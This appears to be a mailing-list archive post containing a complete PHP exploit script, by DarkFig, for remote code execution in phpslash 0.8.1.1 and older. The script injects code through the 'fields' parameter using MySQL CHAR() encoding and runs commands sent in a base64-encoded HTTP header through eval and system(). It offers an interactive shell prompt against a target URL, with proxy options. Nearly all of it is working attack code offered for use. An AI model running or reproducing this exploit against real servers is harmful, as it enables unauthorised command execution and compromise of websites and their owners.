[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

phpslash <= 0.8.1.1 Remote Code Execution Exploit



#!/usr/bin/php -q
<?php
#
# This file requires the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
##################################################
#
# phpslash <= 0.8.1.1 Remote Code Execution Exploit
# - - - - - - - - - - - - - - - - - - - - - - - - - 
# RCE with no special rights (guest).
# No special PHP conditions required.
# - - - - - - - - - - - - - - - - - - - - - - - - - 
# #0 It was a private sploit, but I decided to publish
# it #1 You did the fag on that one bro, it will not happen
# again =). #2 Don't try to use it on hzv, I helped them
# to patch this one before I publish it =)
# - - - - - - - - - - - - - - - - - - - - - - - - - 
# Exploitation steps:
# 1 - include/class/tz_functions.inc tz_strftime()
# 2 - include/class/tz_functions.inc tz_generic()
# 3 - include/tz_env.class           generic()
#
error_reporting( E_ALL ^ E_NOTICE );
require('phpsploitclass.php');

// Main function
function main()
{
	// :)
	$web = new phpsploit();
	$web->agent( 'Mozilla Firefox' );

	// Hey ya :)
	head();

	// Target
	$url = get_p( 'url', true );
	
	// Proxy options
	$prh = get_p( 'proxhost' );
	$pra = get_p( 'proxauth' );

	// Use a proxy ?
	if( $prh )
	{
		// host:ip
		$web->proxy( $prh );
		
		// Authentication
		if( $pra )
		$web->proxyauth( $pra );
	}
	
	// Single quote bypass
	$byp = "1');";

	// PHP code
	$php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';

	// Separator
	$s_sep = md5( rand( 0, 1000000000 ) . 'HEY_YA' );
	$c_sep = "print('$s_sep');";

	// Final PHP code
	$final = $byp . $c_sep  . $php . $c_sep  . 'exit();//';

	// Welcome guess !
	while( ($cmd = cmd_prompt()) !== false )
	{
		// magic_quotes_gpc bypass
		$web->addheader( 'MypCode', base64_encode( 'system("' . add_slashes($cmd) . '");' ) );
	
		// Go =]
		$web->get( $url . 'index.php?fields=' . to_char( $final ) . ',1' );

		// Result
		$res = explode( $s_sep, $web->getcontent() );

		// Erf 
		if( !isset( $res[1] ) )
		{
			print "\nFailed";
			exit(1);
		}
		// Cool
		else
		{
			if( empty( $res[1] ) )
			print "\nNo output: system() disabled OR cmd failed OR cmd without output";
			
			else
			print "\n" . $res[1];
		}
	}
	
	return;
}

// No more bug with " and $
function add_slashes( $str )
{
	return str_replace( '$', '\\$', addslashes( $str ) );
}

// Command prompt
function cmd_prompt()
{
	print "\nshell>";

	$cmd = trim( fgets( STDIN ) );
	
	// Wanna stop =( ?
	if( in_array( strtolower( $cmd ) , array( 'exit', 'quit' ) ) )
	return false;
	
	else 
	return $cmd;
}

// MySQL CHAR() encoding
function to_char( $data )
{
	$chars = 'CHAR(';
	$len   = strlen( $data );
	
	for( $i = 0; $i < $len; $i++ )
	{
		$chars .= ord( $data[ $i ] );
		
		if( $i != $len-1 )
		$chars .= ',';
	}
	
	return $chars . ')';
}

// CLI params
function get_p( $p, $exit = false )
{
	foreach( $_SERVER['argv'] as $key => $value )
	{
		if( $value === '-' . $p )
		{
			if( isset( $_SERVER['argv'][ $key+1 ] ) &&
			   !empty( $_SERVER['argv'][ $key+1 ] ) )
			{					
				return $_SERVER['argv'][ $key+1 ];
			}
			else
			{
				if( $exit )
				usage();
					
				return true;
			}
		}
	}
		
	if( $exit )
	usage();
		
	return false;
}
	
// Headers =)
function head()
{
	print "\nphpslash <= 0.8.1.1 Remote Code Execution Exploit\n";
	print "-------------------------------------------------\n\n";
	print " About: \n";
	print "  by DarkFig  < gmdarkfig (at) gmail (dot) com >\n";
	print "  http://acid-root.new.fr/\n";;
	print "  #acidroot@xxxxxxxxxxxxxxxx\n\n";
	
	return;
}

// Usage, can help..
function usage()
{
	print " Usage:\n";
	print "  php spl.php -url <website> [options]\n\n";
	print " Example:\n";
	print "  php spl.php -url http://victim.com/\n\n";;
	print " Options:\n";
	print "  -proxhost <ip:port> if you wanna use a proxy\n";
	print "  -proxauth <usr:pwd> proxy with authentication\n";
	
	exit(0);
}

// Run baby
main();

?>